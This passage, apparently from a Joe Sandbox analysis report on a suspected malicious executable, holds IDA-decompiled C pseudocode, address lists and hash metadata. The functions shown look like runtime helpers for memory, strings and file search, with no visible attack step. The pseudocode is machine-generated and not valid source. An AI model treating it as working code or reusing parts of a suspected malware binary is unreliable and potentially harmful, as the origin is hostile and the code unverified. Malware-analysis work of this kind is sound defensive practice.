                                                                                                                                      							if(_t177 <= 0) {
                                                                                                                                      								L27:
                                                                                                                                      								E0131407D(_t184);
                                                                                                                                      								goto L28;
                                                                                                                                      							} else {
                                                                                                                                      								_t148 = _v32;
                                                                                                                                      								_t185 = _v40;
                                                                                                                                      								while( *_t148 > 0) {
                                                                                                                                      									_t135 =  *_t181;
                                                                                                                                      									_t181 = _t181 + 2;
                                                                                                                                      									 *( *_t185) = _t135;
                                                                                                                                      									 *_t185 =  &(( *_t185)[0]);
                                                                                                                                      									 *_t148 =  *_t148 - 1;
                                                                                                                                      									_t177 = _t177 - 1;
                                                                                                                                      									if(_t177 > 0) {
                                                                                                                                      										continue;
                                                                                                                                      									}
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t184 = _v28;
                                                                                                                                      								goto L27;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                      						_t137 = _t129 & _t175 + 0x00000008;
                                                                                                                                      						_t165 = _t175 + 8;
                                                                                                                                      						if((_t129 & _t175 + 0x00000008) > 0x400) {
                                                                                                                                      							__eflags = _t175 - _t165;
                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                      							_t186 = E013151CD(_t165, _t137 & _t165);
                                                                                                                                      							_v28 = _t186;
                                                                                                                                      							_pop(_t165);
                                                                                                                                      							__eflags = _t186;
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								goto L30;
                                                                                                                                      							}
                                                                                                                                      							 *_t186 = 0xdddd;
                                                                                                                                      							L14:
                                                                                                                                      							_t184 = _t186 + 8;
                                                                                                                                      							goto L18;
                                                                                                                                      						}
                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                      						E01322CE0();
                                                                                                                                      						_t186 = _t188;
                                                                                                                                      						_v28 = _t186;
                                                                                                                                      						if(_t186 == 0) {
                                                                                                                                      							goto L30;
                                                                                                                                      						}
                                                                                                                                      						 *_t186 = 0xcccc;
                                                                                                                                      						goto L14;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}
































































                                                                                                                                      0x01317ae5
                                                                                                                                      0x01317aed
                                                                                                                                      0x01317af4
                                                                                                                                      0x01317afa
                                                                                                                                      0x01317afd
                                                                                                                                      0x01317b04
                                                                                                                                      0x01317b07
                                                                                                                                      0x01317b0d
                                                                                                                                      0x01317b10
                                                                                                                                      0x01317b14
                                                                                                                                      0x01317b17
                                                                                                                                      0x01317b1b
                                                                                                                                      0x01317b1e
                                                                                                                                      0x01317b35
                                                                                                                                      0x01317b35
                                                                                                                                      0x01317b20
                                                                                                                                      0x01317b23
                                                                                                                                      0x01317b2d
                                                                                                                                      0x01317b2d
                                                                                                                                      0x01317b25
                                                                                                                                      0x01317b25
                                                                                                                                      0x01317b25
                                                                                                                                      0x01317b25
                                                                                                                                      0x01317b23
                                                                                                                                      0x01317b42
                                                                                                                                      0x00000000
                                                                                                                                      0x01317b48
                                                                                                                                      0x01317b51
                                                                                                                                      0x01317b58
                                                                                                                                      0x01317b62
                                                                                                                                      0x01317b65
                                                                                                                                      0x01317b6d
                                                                                                                                      0x01317b75
                                                                                                                                      0x01317b7d
                                                                                                                                      0x01317b84
                                                                                                                                      0x01317b8a
                                                                                                                                      0x01317b91
                                                                                                                                      0x01317b93
                                                                                                                                      0x01317ba9
                                                                                                                                      0x01317bb1
                                                                                                                                      0x01317bb7
                                                                                                                                      0x01317b95
                                                                                                                                      0x01317b9c
                                                                                                                                      0x01317ba2
                                                                                                                                      0x01317ba2
                                                                                                                                      0x01317bbc
                                                                                                                                      0x01317bc0
                                                                                                                                      0x00000000
                                                                                                                                      0x01317bc6
                                                                                                                                      0x01317bc6
                                                                                                                                      0x01317bc9
                                                                                                                                      0x01317bce
                                                                                                                                      0x01317bd2
                                                                                                                                      0x01317c2c
                                                                                                                                      0x01317c2c
                                                                                                                                      0x01317c2e
                                                                                                                                      0x01317c2e
                                                                                                                                      0x01317c33
                                                                                                                                      0x01317cb3
                                                                                                                                      0x01317cb5
                                                                                                                                      0x01317cba
                                                                                                                                      0x01317f31
                                                                                                                                      0x01317f31
                                                                                                                                      0x01317f31
                                                                                                                                      0x01317f34
                                                                                                                                      0x01317f37
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317cc3
                                                                                                                                      0x01317cc6
                                                                                                                                      0x01317c9d
                                                                                                                                      0x01317c9f
                                                                                                                                      0x01317cb2
                                                                                                                                      0x01317cb2
                                                                                                                                      0x01317cc8
                                                                                                                                      0x01317ccc
                                                                                                                                      0x01317ccc
                                                                                                                                      0x01317cce
                                                                                                                                      0x01317cd1
                                                                                                                                      0x01317cd3
                                                                                                                                      0x01317cd6
                                                                                                                                      0x01317cd6
                                                                                                                                      0x01317cd9
                                                                                                                                      0x01317cda
                                                                                                                                      0x01317cda
                                                                                                                                      0x01317cdf
                                                                                                                                      0x01317ce2
                                                                                                                                      0x01317ce5
                                                                                                                                      0x01317ce8
                                                                                                                                      0x01317ceb
                                                                                                                                      0x01317e20
                                                                                                                                      0x01317e20
                                                                                                                                      0x01317e23
                                                                                                                                      0x01317ef0
                                                                                                                                      0x01317ef0
                                                                                                                                      0x01317ef3
                                                                                                                                      0x01317f0c
                                                                                                                                      0x01317f10
                                                                                                                                      0x01317f10
                                                                                                                                      0x01317f12
                                                                                                                                      0x01317f12
                                                                                                                                      0x01317f22
                                                                                                                                      0x01317f27
                                                                                                                                      0x01317f2a
                                                                                                                                      0x01317f2c
                                                                                                                                      0x01317f47
                                                                                                                                      0x00000000
                                                                                                                                      0x01317f4d
                                                                                                                                      0x01317f2e
                                                                                                                                      0x01317f2e
                                                                                                                                      0x00000000
                                                                                                                                      0x01317f2e
                                                                                                                                      0x01317ef5
                                                                                                                                      0x01317ef5
                                                                                                                                      0x01317ef8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317efa
                                                                                                                                      0x01317efa
                                                                                                                                      0x01317efd
                                                                                                                                      0x01317f02
                                                                                                                                      0x01317f05
                                                                                                                                      0x01317f08
                                                                                                                                      0x00000000
                                                                                                                                      0x01317f08
                                                                                                                                      0x01317e29
                                                                                                                                      0x01317e29
                                                                                                                                      0x01317e2c
                                                                                                                                      0x01317edc
                                                                                                                                      0x01317edc
                                                                                                                                      0x01317edf
                                                                                                                                      0x01317ee8
                                                                                                                                      0x01317eec
                                                                                                                                      0x01317eec
                                                                                                                                      0x00000000
                                                                                                                                      0x01317eec
                                                                                                                                      0x01317ee1
                                                                                                                                      0x01317ee1
                                                                                                                                      0x01317ee4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317ee6
                                                                                                                                      0x01317e32
                                                                                                                                      0x01317e32
                                                                                                                                      0x01317e35
                                                                                                                                      0x01317ec8
                                                                                                                                      0x01317ec8
                                                                                                                                      0x01317ecb
                                                                                                                                      0x01317ed4
                                                                                                                                      0x01317ed8
                                                                                                                                      0x01317ed8
                                                                                                                                      0x00000000
                                                                                                                                      0x01317ed8
                                                                                                                                      0x01317ecd
                                                                                                                                      0x01317ecd
                                                                                                                                      0x01317ed0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317ed2
                                                                                                                                      0x01317e3b
                                                                                                                                      0x01317e3b
                                                                                                                                      0x01317e3e
                                                                                                                                      0x01317e67
                                                                                                                                      0x01317e6a
                                                                                                                                      0x01317e6e
                                                                                                                                      0x01317e78
                                                                                                                                      0x01317e70
                                                                                                                                      0x01317e70
                                                                                                                                      0x01317e70
                                                                                                                                      0x01317e7e
                                                                                                                                      0x01317e81
                                                                                                                                      0x01317e9d
                                                                                                                                      0x01317e9d
                                                                                                                                      0x01317ea0
                                                                                                                                      0x01317ea3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317ea9
                                                                                                                                      0x01317eac
                                                                                                                                      0x01317eac
                                                                                                                                      0x01317eaf
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317eb3
                                                                                                                                      0x01317eb6
                                                                                                                                      0x01317eb9
                                                                                                                                      0x01317ebc
                                                                                                                                      0x01317ebe
                                                                                                                                      0x01317ec1
                                                                                                                                      0x01317ec4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317ec6
                                                                                                                                      0x01317e83
                                                                                                                                      0x01317e83
                                                                                                                                      0x01317e86
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e88
                                                                                                                                      0x01317e90
                                                                                                                                      0x01317e93
                                                                                                                                      0x01317e96
                                                                                                                                      0x01317e96
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e81
                                                                                                                                      0x01317e40
                                                                                                                                      0x01317e43
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e4a
                                                                                                                                      0x01317e4a
                                                                                                                                      0x01317e4d
                                                                                                                                      0x01317e60
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e60
                                                                                                                                      0x01317e50
                                                                                                                                      0x01317e50
                                                                                                                                      0x01317e53
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e59
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e59
                                                                                                                                      0x01317cf1
                                                                                                                                      0x01317def
                                                                                                                                      0x01317def
                                                                                                                                      0x01317df2
                                                                                                                                      0x01317e15
                                                                                                                                      0x01317e19
                                                                                                                                      0x01317e19
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e19
                                                                                                                                      0x01317df4
                                                                                                                                      0x01317df4
                                                                                                                                      0x01317df7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317df9
                                                                                                                                      0x01317df9
                                                                                                                                      0x01317dfc
                                                                                                                                      0x01317e0e
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e0e
                                                                                                                                      0x01317dfe
                                                                                                                                      0x01317dfe
                                                                                                                                      0x01317e01
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e07
                                                                                                                                      0x00000000
                                                                                                                                      0x01317e07
                                                                                                                                      0x01317cf7
                                                                                                                                      0x01317cfa
                                                                                                                                      0x01317d9c
                                                                                                                                      0x01317d9c
                                                                                                                                      0x01317da1
                                                                                                                                      0x01317da7
                                                                                                                                      0x01317da7
                                                                                                                                      0x01317da8
                                                                                                                                      0x01317dab
                                                                                                                                      0x01317db1
                                                                                                                                      0x01317db4
                                                                                                                                      0x01317db7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317dbd
                                                                                                                                      0x01317dc0
                                                                                                                                      0x01317dc0
                                                                                                                                      0x01317dc3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317dcb
                                                                                                                                      0x01317dcc
                                                                                                                                      0x01317dcf
                                                                                                                                      0x01317dd2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317dda
                                                                                                                                      0x01317ddd
                                                                                                                                      0x01317de0
                                                                                                                                      0x01317de2
                                                                                                                                      0x01317de5
                                                                                                                                      0x01317de8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317dea
                                                                                                                                      0x01317dc0
                                                                                                                                      0x00000000
                                                                                                                                      0x01317dab
                                                                                                                                      0x01317d00
                                                                                                                                      0x01317d03
                                                                                                                                      0x01317d18
                                                                                                                                      0x01317d1e
                                                                                                                                      0x01317d25
                                                                                                                                      0x01317d27
                                                                                                                                      0x01317d82
                                                                                                                                      0x01317d88
                                                                                                                                      0x01317d89
                                                                                                                                      0x01317d8b
                                                                                                                                      0x01317d8d
                                                                                                                                      0x01317d90
                                                                                                                                      0x01317d90
                                                                                                                                      0x01317d29
                                                                                                                                      0x01317d29
                                                                                                                                      0x01317d29
                                                                                                                                      0x01317d2c
                                                                                                                                      0x01317d2c
                                                                                                                                      0x01317d93
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d93
                                                                                                                                      0x01317d05
                                                                                                                                      0x01317d08
                                                                                                                                      0x01317d62
                                                                                                                                      0x01317d62
                                                                                                                                      0x01317d65
                                                                                                                                      0x01317d71
                                                                                                                                      0x01317d75
                                                                                                                                      0x01317d75
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d75
                                                                                                                                      0x01317d67
                                                                                                                                      0x01317d67
                                                                                                                                      0x01317d6a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d6c
                                                                                                                                      0x01317d0a
                                                                                                                                      0x01317d0d
                                                                                                                                      0x01317d31
                                                                                                                                      0x01317d31
                                                                                                                                      0x01317d34
                                                                                                                                      0x01317d57
                                                                                                                                      0x01317d5b
                                                                                                                                      0x01317d5b
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d5b
                                                                                                                                      0x01317d36
                                                                                                                                      0x01317d36
                                                                                                                                      0x01317d39
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d3b
                                                                                                                                      0x01317d3b
                                                                                                                                      0x01317d3e
                                                                                                                                      0x01317d50
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d50
                                                                                                                                      0x01317d40
                                                                                                                                      0x01317d40
                                                                                                                                      0x01317d43
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d49
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d49
                                                                                                                                      0x01317d0f
                                                                                                                                      0x01317d12
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317d12
                                                                                                                                      0x00000000
                                                                                                                                      0x01317f3d
                                                                                                                                      0x01317c35
                                                                                                                                      0x01317c3c
                                                                                                                                      0x01317c65
                                                                                                                                      0x01317c3e
                                                                                                                                      0x01317c4d
                                                                                                                                      0x01317c4d
                                                                                                                                      0x01317c6c
                                                                                                                                      0x01317c6e
                                                                                                                                      0x01317c71
                                                                                                                                      0x01317c96
                                                                                                                                      0x01317c97
                                                                                                                                      0x00000000
                                                                                                                                      0x01317c73
                                                                                                                                      0x01317c73
                                                                                                                                      0x01317c76
                                                                                                                                      0x01317c79
                                                                                                                                      0x01317c80
                                                                                                                                      0x01317c83
                                                                                                                                      0x01317c86
                                                                                                                                      0x01317c89
                                                                                                                                      0x01317c8c
                                                                                                                                      0x01317c8e
                                                                                                                                      0x01317c91
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317c91
                                                                                                                                      0x01317c93
                                                                                                                                      0x00000000
                                                                                                                                      0x01317c93
                                                                                                                                      0x01317c71
                                                                                                                                      0x01317bd9
                                                                                                                                      0x01317bdb
                                                                                                                                      0x01317bdd
                                                                                                                                      0x01317be5
                                                                                                                                      0x01317c0a
                                                                                                                                      0x01317c0c
                                                                                                                                      0x01317c16
                                                                                                                                      0x01317c18
                                                                                                                                      0x01317c1b
                                                                                                                                      0x01317c1c
                                                                                                                                      0x01317c1e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317c24
                                                                                                                                      0x01317c05
                                                                                                                                      0x01317c05
                                                                                                                                      0x00000000
                                                                                                                                      0x01317c05
                                                                                                                                      0x01317be9
                                                                                                                                      0x01317bed
                                                                                                                                      0x01317bf2
                                                                                                                                      0x01317bf4
                                                                                                                                      0x01317bf9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01317bff
                                                                                                                                      0x00000000
                                                                                                                                      0x01317bff
                                                                                                                                      0x01317bc0

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$_free
                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                      • API String ID: 3432400110-3206640213
                                                                                                                                      • Opcode ID: 442ab80788016c42ee96f875210e50a2fb5ccba02c445fa845f858c435a5544d
                                                                                                                                      • Instruction ID: f383ee353c85f4d68c059416053b421b7e5461322db4ab9aa2026664332cf805
                                                                                                                                      • Opcode Fuzzy Hash: 442ab80788016c42ee96f875210e50a2fb5ccba02c445fa845f858c435a5544d
                                                                                                                                      • Instruction Fuzzy Hash: 71D1267590020ACAEB2D8F6CC8457BABBB5FF05308F1C4159EA05AB65CD3759D81CBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                      			E01318C16(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                      				intOrPtr _v0;
                                                                                                                                      				char _v6;
                                                                                                                                      				char _v8;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				signed int _v24;
                                                                                                                                      				signed int _v28;
                                                                                                                                      				signed int _v36;
                                                                                                                                      				intOrPtr* _v64;
                                                                                                                                      				intOrPtr _v96;
                                                                                                                                      				intOrPtr* _v100;
                                                                                                                                      				CHAR* _v104;
                                                                                                                                      				signed int _v116;
                                                                                                                                      				char _v290;
                                                                                                                                      				signed int _v291;
                                                                                                                                      				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                      				union _FINDEX_INFO_LEVELS _v340;
                                                                                                                                      				signed int _v344;
                                                                                                                                      				signed int _v348;
                                                                                                                                      				intOrPtr _v440;
                                                                                                                                      				intOrPtr* _t80;
                                                                                                                                      				signed int _t82;
                                                                                                                                      				signed int _t87;
                                                                                                                                      				signed int _t91;
                                                                                                                                      				signed int _t93;
                                                                                                                                      				signed int _t95;
                                                                                                                                      				signed int _t96;
                                                                                                                                      				signed int _t100;
                                                                                                                                      				signed int _t103;
                                                                                                                                      				signed int _t108;
                                                                                                                                      				signed int _t111;
                                                                                                                                      				intOrPtr _t113;
                                                                                                                                      				signed char _t115;
                                                                                                                                      				union _FINDEX_INFO_LEVELS _t123;
                                                                                                                                      				signed int _t128;
                                                                                                                                      				signed int _t131;
                                                                                                                                      				void* _t137;
                                                                                                                                      				void* _t139;
                                                                                                                                      				signed int _t140;
                                                                                                                                      				signed int _t143;
                                                                                                                                      				signed int _t145;
                                                                                                                                      				signed int _t147;
                                                                                                                                      				signed int* _t148;
                                                                                                                                      				signed int _t151;
                                                                                                                                      				void* _t154;
                                                                                                                                      				CHAR* _t155;
                                                                                                                                      				char _t158;
                                                                                                                                      				char _t160;
                                                                                                                                      				intOrPtr* _t163;
                                                                                                                                      				void* _t164;
                                                                                                                                      				intOrPtr* _t165;
                                                                                                                                      				signed int _t167;
                                                                                                                                      				void* _t169;
                                                                                                                                      				intOrPtr* _t170;
                                                                                                                                      				signed int _t174;
                                                                                                                                      				signed int _t178;
                                                                                                                                      				signed int _t179;
                                                                                                                                      				intOrPtr* _t184;
                                                                                                                                      				void* _t193;
                                                                                                                                      				intOrPtr _t194;
                                                                                                                                      				signed int _t196;
                                                                                                                                      				signed int _t197;
                                                                                                                                      				signed int _t199;
                                                                                                                                      				signed int _t200;
                                                                                                                                      				signed int _t202;
                                                                                                                                      				union _FINDEX_INFO_LEVELS _t203;
                                                                                                                                      				signed int _t208;
                                                                                                                                      				signed int _t210;
                                                                                                                                      				signed int _t211;
                                                                                                                                      				void* _t213;
                                                                                                                                      				intOrPtr _t214;
                                                                                                                                      				void* _t215;
                                                                                                                                      				signed int _t219;
                                                                                                                                      				void* _t221;
                                                                                                                                      				signed int _t222;
                                                                                                                                      				void* _t223;
                                                                                                                                      				void* _t224;
                                                                                                                                      				void* _t225;
                                                                                                                                      				signed int _t226;
                                                                                                                                      				void* _t227;
                                                                                                                                      				void* _t228;
                                                                                                                                      
                                                                                                                                      				_t80 = _a8;
                                                                                                                                      				_t224 = _t223 - 0x20;
                                                                                                                                      				if(_t80 != 0) {
                                                                                                                                      					_t208 = _a4;
                                                                                                                                      					_t160 = 0;
                                                                                                                                      					 *_t80 = 0;
                                                                                                                                      					_t199 = 0;
                                                                                                                                      					_t151 = 0;
                                                                                                                                      					_v36 = 0;
                                                                                                                                      					_v336.cAlternateFileName = 0;
                                                                                                                                      					_v28 = 0;
                                                                                                                                      					__eflags =  *_t208;
                                                                                                                                      					if( *_t208 == 0) {
                                                                                                                                      						L9:
                                                                                                                                      						_v12 = _v12 & 0x00000000;
                                                                                                                                      						_t82 = _t151 - _t199;
                                                                                                                                      						_v8 = _t160;
                                                                                                                                      						_t191 = (_t82 >> 2) + 1;
                                                                                                                                      						__eflags = _t151 - _t199;
                                                                                                                                      						_v16 = (_t82 >> 2) + 1;
                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                      						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                                                                                                      						__eflags = _t210;
                                                                                                                                      						if(_t210 != 0) {
                                                                                                                                      							_t197 = _t199;
                                                                                                                                      							_t158 = _t160;
                                                                                                                                      							do {
                                                                                                                                      								_t184 =  *_t197;
                                                                                                                                      								_t17 = _t184 + 1; // 0x1
                                                                                                                                      								_v8 = _t17;
                                                                                                                                      								do {
                                                                                                                                      									_t143 =  *_t184;
                                                                                                                                      									_t184 = _t184 + 1;
                                                                                                                                      									__eflags = _t143;
                                                                                                                                      								} while (_t143 != 0);
                                                                                                                                      								_t158 = _t158 + 1 + _t184 - _v8;
                                                                                                                                      								_t197 = _t197 + 4;
                                                                                                                                      								_t145 = _v12 + 1;
                                                                                                                                      								_v12 = _t145;
                                                                                                                                      								__eflags = _t145 - _t210;
                                                                                                                                      							} while (_t145 != _t210);
                                                                                                                                      							_t191 = _v16;
                                                                                                                                      							_v8 = _t158;
                                                                                                                                      							_t151 = _v336.cAlternateFileName;
                                                                                                                                      						}
                                                                                                                                      						_t211 = E01312BCB(_t191, _v8, 1);
                                                                                                                                      						_t225 = _t224 + 0xc;
                                                                                                                                      						__eflags = _t211;
                                                                                                                                      						if(_t211 != 0) {
                                                                                                                                      							_t87 = _t211 + _v16 * 4;
                                                                                                                                      							_v20 = _t87;
                                                                                                                                      							_t192 = _t87;
                                                                                                                                      							_v16 = _t87;
                                                                                                                                      							__eflags = _t199 - _t151;
                                                                                                                                      							if(_t199 == _t151) {
                                                                                                                                      								L23:
                                                                                                                                      								_t200 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								 *_a8 = _t211;
                                                                                                                                      								goto L24;
                                                                                                                                      							} else {
                                                                                                                                      								_t93 = _t211 - _t199;
                                                                                                                                      								__eflags = _t93;
                                                                                                                                      								_v24 = _t93;
                                                                                                                                      								do {
                                                                                                                                      									_t163 =  *_t199;
                                                                                                                                      									_v12 = _t163 + 1;
                                                                                                                                      									do {
                                                                                                                                      										_t95 =  *_t163;
                                                                                                                                      										_t163 = _t163 + 1;
                                                                                                                                      										__eflags = _t95;
                                                                                                                                      									} while (_t95 != 0);
                                                                                                                                      									_t164 = _t163 - _v12;
                                                                                                                                      									_t35 = _t164 + 1; // 0x1
                                                                                                                                      									_t96 = _t35;
                                                                                                                                      									_push(_t96);
                                                                                                                                      									_v12 = _t96;
                                                                                                                                      									_t100 = E0131F2ED(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                                                                                                      									_t225 = _t225 + 0x10;
                                                                                                                                      									__eflags = _t100;
                                                                                                                                      									if(_t100 != 0) {
                                                                                                                                      										_push(0);
                                                                                                                                      										_push(0);
                                                                                                                                      										_push(0);
                                                                                                                                      										_push(0);
                                                                                                                                      										_push(0);
                                                                                                                                      										E013110E6();
                                                                                                                                      										asm("int3");
                                                                                                                                      										_t221 = _t225;
                                                                                                                                      										_push(_t164);
                                                                                                                                      										_t165 = _v64;
                                                                                                                                      										_t47 = _t165 + 1; // 0x1
                                                                                                                                      										_t193 = _t47;
                                                                                                                                      										do {
                                                                                                                                      											_t103 =  *_t165;
                                                                                                                                      											_t165 = _t165 + 1;
                                                                                                                                      											__eflags = _t103;
                                                                                                                                      										} while (_t103 != 0);
                                                                                                                                      										_push(_t199);
                                                                                                                                      										_t202 = _a8;
                                                                                                                                      										_t167 = _t165 - _t193 + 1;
                                                                                                                                      										_v12 = _t167;
                                                                                                                                      										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                                                                                                      										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                                                                                                      											_push(_t151);
                                                                                                                                      											_t50 = _t202 + 1; // 0x1
                                                                                                                                      											_t154 = _t50 + _t167;
                                                                                                                                      											_t213 = E013145B8(_t167, _t154, 1);
                                                                                                                                      											_t169 = _t211;
                                                                                                                                      											__eflags = _t202;
                                                                                                                                      											if(_t202 == 0) {
                                                                                                                                      												L34:
                                                                                                                                      												_push(_v12);
                                                                                                                                      												_t154 = _t154 - _t202;
                                                                                                                                      												_t108 = E0131F2ED(_t169, _t213 + _t202, _t154, _v0);
                                                                                                                                      												_t226 = _t225 + 0x10;
                                                                                                                                      												__eflags = _t108;
                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                      													goto L37;
                                                                                                                                      												} else {
                                                                                                                                      													_t137 = E01318FE5(_a12, __eflags, _t213);
                                                                                                                                      													E01314615(0);
                                                                                                                                      													_t139 = _t137;
                                                                                                                                      													goto L36;
                                                                                                                                      												}
                                                                                                                                      											} else {
                                                                                                                                      												_push(_t202);
                                                                                                                                      												_t140 = E0131F2ED(_t169, _t213, _t154, _a4);
                                                                                                                                      												_t226 = _t225 + 0x10;
                                                                                                                                      												__eflags = _t140;
                                                                                                                                      												if(_t140 != 0) {
                                                                                                                                      													L37:
                                                                                                                                      													_push(0);
                                                                                                                                      													_push(0);
                                                                                                                                      													_push(0);
                                                                                                                                      													_push(0);
                                                                                                                                      													_push(0);
                                                                                                                                      													E013110E6();
                                                                                                                                      													asm("int3");
                                                                                                                                      													_push(_t221);
                                                                                                                                      													_t222 = _t226;
                                                                                                                                      													_t227 = _t226 - 0x150;
                                                                                                                                      													_t111 =  *0x132e00c; // 0x17120af4
                                                                                                                                      													_v116 = _t111 ^ _t222;
                                                                                                                                      													_t170 = _v100;
                                                                                                                                      													_push(_t154);
                                                                                                                                      													_t155 = _v104;
                                                                                                                                      													_push(_t213);
                                                                                                                                      													_t214 = _v96;
                                                                                                                                      													_push(_t202);
                                                                                                                                      													_v440 = _t214;
                                                                                                                                      													while(1) {
                                                                                                                                      														__eflags = _t170 - _t155;
                                                                                                                                      														if(_t170 == _t155) {
                                                                                                                                      															break;
                                                                                                                                      														}
                                                                                                                                      														_t113 =  *_t170;
                                                                                                                                      														__eflags = _t113 - 0x2f;
                                                                                                                                      														if(_t113 != 0x2f) {
                                                                                                                                      															__eflags = _t113 - 0x5c;
                                                                                                                                      															if(_t113 != 0x5c) {
                                                                                                                                      																__eflags = _t113 - 0x3a;
                                                                                                                                      																if(_t113 != 0x3a) {
                                                                                                                                      																	_t170 = E0131F7C0(_t155, _t170);
                                                                                                                                      																	continue;
                                                                                                                                      																}
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      														break;
                                                                                                                                      													}
                                                                                                                                      													_t194 =  *_t170;
                                                                                                                                      													__eflags = _t194 - 0x3a;
                                                                                                                                      													if(_t194 != 0x3a) {
                                                                                                                                      														L47:
                                                                                                                                      														_t203 = 0;
                                                                                                                                      														__eflags = _t194 - 0x2f;
                                                                                                                                      														if(_t194 == 0x2f) {
                                                                                                                                      															L51:
                                                                                                                                      															_t115 = 1;
                                                                                                                                      															__eflags = 1;
                                                                                                                                      														} else {
                                                                                                                                      															__eflags = _t194 - 0x5c;
                                                                                                                                      															if(_t194 == 0x5c) {
                                                                                                                                      																goto L51;
                                                                                                                                      															} else {
                                                                                                                                      																__eflags = _t194 - 0x3a;
                                                                                                                                      																if(_t194 == 0x3a) {
                                                                                                                                      																	goto L51;
                                                                                                                                      																} else {
                                                                                                                                      																	_t115 = 0;
                                                                                                                                      																}
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      														asm("sbb eax, eax");
                                                                                                                                      														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                                                                                                      														E0130C510(_t203,  &_v336, _t203, 0x140);
                                                                                                                                      														_t228 = _t227 + 0xc;
                                                                                                                                      														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                                                                                                      														_t123 = _v340;
                                                                                                                                      														__eflags = _t215 - 0xffffffff;
                                                                                                                                      														if(_t215 != 0xffffffff) {
                                                                                                                                      															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                                                                                                      															__eflags = _t174;
                                                                                                                                      															_v348 = _t174 >> 2;
                                                                                                                                      															do {
                                                                                                                                      																__eflags = _v336.cFileName - 0x2e;
                                                                                                                                      																if(_v336.cFileName != 0x2e) {
                                                                                                                                      																	L64:
